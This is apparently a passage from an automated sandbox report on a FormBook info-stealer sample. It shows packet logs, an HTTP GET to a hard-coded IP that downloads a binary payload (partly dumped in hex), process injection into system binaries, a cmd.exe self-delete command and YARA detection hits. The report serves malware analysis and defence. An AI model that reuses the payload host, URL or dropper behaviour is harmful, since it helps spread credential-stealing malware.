                        Nov 19, 2020 10:50:01.526223898 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.526320934 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.526366949 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.553169966 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.553255081 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.841959953 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.841984034 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.842006922 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.842037916 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.842037916 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.842051029 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.842062950 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.842067003 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.842117071 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.842133999 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.842134953 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.842181921 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.842197895 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.842242956 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.842279911 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.842295885 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.842328072 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.842351913 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.842363119 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.842407942 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.842443943 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.842494965 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.158025980 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158051014 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158068895 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158085108 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158101082 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158121109 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158139944 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158155918 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158174038 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158181906 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.158190966 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158209085 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158226013 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158242941 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158263922 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158279896 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.158282042 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158301115 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158318996 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158354044 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.158374071 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158417940 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.158487082 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.158524990 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158545017 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158564091 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158581018 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158598900 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158612967 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.158642054 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158658981 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.158679962 CET8049756103.125.191.5192.168.2.4

                        HTTP Request Dependency Graph

                        • 103.125.191.5

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.449756103.125.191.580C:\Users\user\Desktop\2eD17GZuWs.exe
                        TimestampkBytes transferredDirectionData
                        Nov 19, 2020 10:49:58.574579954 CET5396OUTGET /bin_xMjelaYnr43.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                        Host: 103.125.191.5
                        Cache-Control: no-cache
                        Nov 19, 2020 10:49:58.891490936 CET5397INHTTP/1.1 200 OK
                        Date: Thu, 19 Nov 2020 09:49:57 GMT
                        Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
                        Last-Modified: Wed, 18 Nov 2020 21:20:27 GMT
                        ETag: "2d640-5b4682e21b662"
                        Accept-Ranges: bytes
                        Content-Length: 185920
                        Content-Type: application/octet-stream
                        Data Raw: c0 4c c3 db cd c5 93 5d 55 14 39 b6 3e 24 13 09 bd 46 7f a3 38 d8 f5 8c 62 41 6f 79 33 d1 c3 6e 24 67 7f be 71 ac 91 32 8e a6 51 82 fb 00 c1 d3 18 14 ac 84 80 9b 97 89 ea 59 7b ab 1c fa b4 72 2c 81 92 87 0a 86 9b f1 e4 60 41 0f ba e3 88 b0 31 87 78 80 d1 c2 4b 58 e6 7e 0a 2f c2 89 af 4c 45 22 b7 b4 a3 90 3b 8f c8 35 eb 5b 59 ae 80 25 67 8a 69 1a 7d e9 5c 2c 34 91 9f d4 99 bf 3a 3d 90 ea 69 a3 02 a5 ec d4 54 93 61 e7 99 3e 6a 28 09 e2 bf b1 11 7c 2a e8 0f d2 66 3d f5 e1 cb a7 e1 1c 31 56 c2 72 72 9e e3 c4 a1 6a c0 e3 30 fa e7 f2 ca 24 ff a7 55 a4 4f 33 01 64 7f 01 ec 28 a6 29 5f 7c 26 dd 8a 41 7c 37 9e 8a 1b c5 98 14 0e 18 7e d5 02 a4 e3 0d 9e e4 ae 42 19 16 6b ed 05 06 39 95 07 40 ec a0 c0 13 c8 1b 2e 54 80 5c 88 94 a6 ff 92 8e 21 0c 19 87 b0 a3 64 29 6d e0 4a 11 d0 c3 d0 d8 36 07 d7 4b f1 a6 7e da a4 16 72 74 b9 e2 f1 30 0b ff 67 72 41 3f 0c e0 b9 d3 c0 6c d6 a5 6a ee e1 99 b7 af 45 55 6a 38 6b f8 4c 53 45 df 8c c5 b4 51 38 56 e8 29 78 f6 27 05 4d 08 a2 d1 1e 24 4a 3f 54 e7 1f a5 bd ff 23 4d de 9b d4 48 98 e3 38 e7 8d 8f 2b c0 a3 dd 39 d7 2f 5d cd d5 93 5f 5b 31 5e b9 3d 02 84 a3 d2 47 05 b9 ba 54 b3 e3 64 dc c9 5c 66 2a 93 d0 b1 70 da 29 d0 65 5f 1c ed ec 81 c6 17 43 00 91 d7 08 98 cd 2d 50 a1 05 53 dd 30 3a e2 4b c0 d0 e7 64 e2 59 4d c8 fa 0e 96 86 f2 9c b3 28 59 1c 76 de c9 bb 54 7e a7 2a 14 87 05 2f eb cc 33 75 64 1a fd e8 e7 a3 4a 0f 8e c6 60 ce e5 b2 95 8c ba 53 39 bf 74 c2 0f 71 90 27 b5 75 bb 1b 12 91 78 d9 85 00 58 ef d6 f4 d5 f9 87 dc 4f 01 42 41 93 45 e9 a7 c9 b3 bf 6c 26 6f b7 51 8b 1b 40 3b 27 08 67 28 15 76 1b 99 02 a2 49 c3 42 4e 83 36 7a c7 f8 ae 35 e9 ce 98 5e 54 33 fc 71 2e cc 8c 40 9b de a5 8a 77 7c 75 60 43 10 81 de bd 93 56 68 9c d7 70 c0 c9 92 7e a3 09 77 de 8a eb c6 d0 15 ae 89 64 71 ef c2 4f d9 a4 61 fd 86 9e 30 d2 59 90 47 3c 65 50 33 b3 1f 16 a5 9b 6d 75 1b 18 fe dd 91 da 35 a5 cc 78 ad a4 63 87 84 26 5c 61 22 38 f1 4b 07 da c2 b9 c0 64 aa 66 53 7f 19 78 45 d4 9a 97 a9 3e a4 5b ac bf d5 ce 32 85 4a 24 a1 55 e7 62 8e ef b2 ca 8c f9 b4 14 10 f5 77 0d 09 a5 d8 b2 61 3d 6d 0d b6 df d7 38 b8 da 38 ba 76 17 20 fc 00 01 89 6e 54 0f 4c 65 12 0b 8b c6 a9 e7 ec cd b8 27 90 a9 57 ee 85 e6 9d e1 36 fb d4 02 87 9f c9 28 c3 dc 13 2c d0 57 64 9f ac e5 ad b6 d2 9d bd 36 57 91 62 3f 90 fe 91 01 ce ab f9 88 77 d0 64 99 be 90 82 ca d7 69 05 c6 05 ea 51 3d 4a b1 07 f4 87 4c 9a c1 e8 f0 5c b0 11 2b 76 fd 38 c2 b4 87 42 ca e5 2e 53 47 cc cf be fc 1d 0b 1d b0 d2 52 d3 75 41 2b a8 9b 9c 6c bd 7d 98 fa 69 cc 11 82 0e 67 1d f7 d2 27 fb 8e 81 2d 41 88 d3 d2 8b db 2c 20 38 7e 2c e8 8a f4 93 cb fc 12 bd fe b6 ea f4 be c0 fd 71 c7 44 ff 59 e8 63 5e 4b f9 e2 4e 5b aa 62 e5 03 f2 71 ff 2e e5 92 49 4d fa 26 bd 06 83 65 3e 1c 68 0c b8 39 b2 5a a2 58 3a 58 f6 a2 83 e7 f0 54 a7 49 eb 7b 34 85 16 fe 7f c1 2d cd d7 be 1a cd d7 ad 02 cb 61 db d7 d5 e2 86 9b f1 e4 38 c2 e7 b3 68 40 33 f1 bb f3 80 d2 03 c8 98 ce 7d 02 d0 23 19 af 4c 45 22 b7 b4 a3 90 3b 8f c8 35 eb 5b 59 ae 80 25 67 8a 69 1a 7d e9 5c 2c 34 91 9f d4 59 bf 3a 3d 9e f5 d3 ad 02 11 e5 19 75 2b 60 ab 54 1f 3e 40 60 91 9f c1 63 13 4d 9a 6e bf 46 5e 94 8f a5 c8 95 3c 53 33 e2 00 07 f0 c3 ad cf 4a 84 ac 63 da 8a 9d ae 41 d1 aa 58 ae 6b 33 01 64 7f 01 ec 28 0d d5 57 96 c9 40 ec f8 93 aa f8
                        Data Ascii: L]U9>$F8bAoy3n$gq2QY{r,`A1xKX~/LE";5[Y%gi}\,4:=iTa>j(|*f=1Vrrj0$UO3d()_|&A|7~Bk9@.T\!d)mJ6K~rt0grA?ljEUj8kLSEQ8V)x'M$J?T#MH8+9/]_[1^=GTd\f*p)e_C-PS0:KdYM(YvT~*/3udJ`S9tq'uxXOBAEl&oQ@;'g(vIBN6z5^T3q.@w|u`CVhp~wdqOa0YG<eP3mu5xc&\a"8KdfSxE>[2J$Ubwa=m88v nTLe'W6(,Wd6Wb?wdiQ=JL\+v8B.SGRuA+l}ig'-A, 8~,qDYc^KN[bq.IM&e>h9ZX:XTI{4-a8h@3}#LE";5[Y%gi}\,4Y:=u+`T>@`cMnF^<S3JcAXk3d(W@


                        Code Manipulations

                        Statistics

                        Behavior

                        Click to jump to process

                        System Behavior

                        Analysis Process: 2eD17GZuWs.exe PID: 4700 Parent PID: 5852

                        General

                        Start time:10:48:23
                        Start date:19/11/2020
                        Path:C:\Users\user\Desktop\2eD17GZuWs.exe
                        Wow64 process (32bit):true
                        Commandline:'C:\Users\user\Desktop\2eD17GZuWs.exe'
                        Imagebase:0x400000
                        File size:61440 bytes
                        MD5 hash:C05EEE88F0B57E853996957D6523397B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Visual Basic
                        Reputation:low

                        Analysis Process: 2eD17GZuWs.exe PID: 2936 Parent PID: 4700

                        General

                        Start time:10:48:34
                        Start date:19/11/2020
                        Path:C:\Users\user\Desktop\2eD17GZuWs.exe
                        Wow64 process (32bit):true
                        Commandline:'C:\Users\user\Desktop\2eD17GZuWs.exe'
                        Imagebase:0x400000
                        File size:61440 bytes
                        MD5 hash:C05EEE88F0B57E853996957D6523397B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:low

                        Analysis Process: explorer.exe PID: 3424 Parent PID: 2936

                        General

                        Start time:10:50:04
                        Start date:19/11/2020
                        Path:C:\Windows\explorer.exe
                        Wow64 process (32bit):false
                        Commandline:
                        Imagebase:0x7ff6fee60000
                        File size:3933184 bytes
                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Analysis Process: autofmt.exe PID: 6660 Parent PID: 3424

                        General

                        Start time:10:50:22
                        Start date:19/11/2020
                        Path:C:\Windows\SysWOW64\autofmt.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\SysWOW64\autofmt.exe
                        Imagebase:0x1150000
                        File size:831488 bytes
                        MD5 hash:7FC345F685C2A58283872D851316ACC4
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        Analysis Process: msiexec.exe PID: 6680 Parent PID: 3424

                        General

                        Start time:10:50:22
                        Start date:19/11/2020
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\msiexec.exe
                        Imagebase:0x1240000
                        File size:59904 bytes
                        MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000D.00000002.932470718.000000000329A000.00000004.00000020.sdmp, Author: Florian Roth
                        • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000D.00000002.935336977.00000000055DF000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:high

                        Analysis Process: cmd.exe PID: 6244 Parent PID: 6680

                        General

                        Start time:10:50:26
                        Start date:19/11/2020
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:/c del 'C:\Users\user\Desktop\2eD17GZuWs.exe'
                        Imagebase:0x11d0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Analysis Process: conhost.exe PID: 5668 Parent PID: 6244

                        General

                        Start time:10:50:27
                        Start date:19/11/2020
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Disassembly

                        Code Analysis

                        Reset < >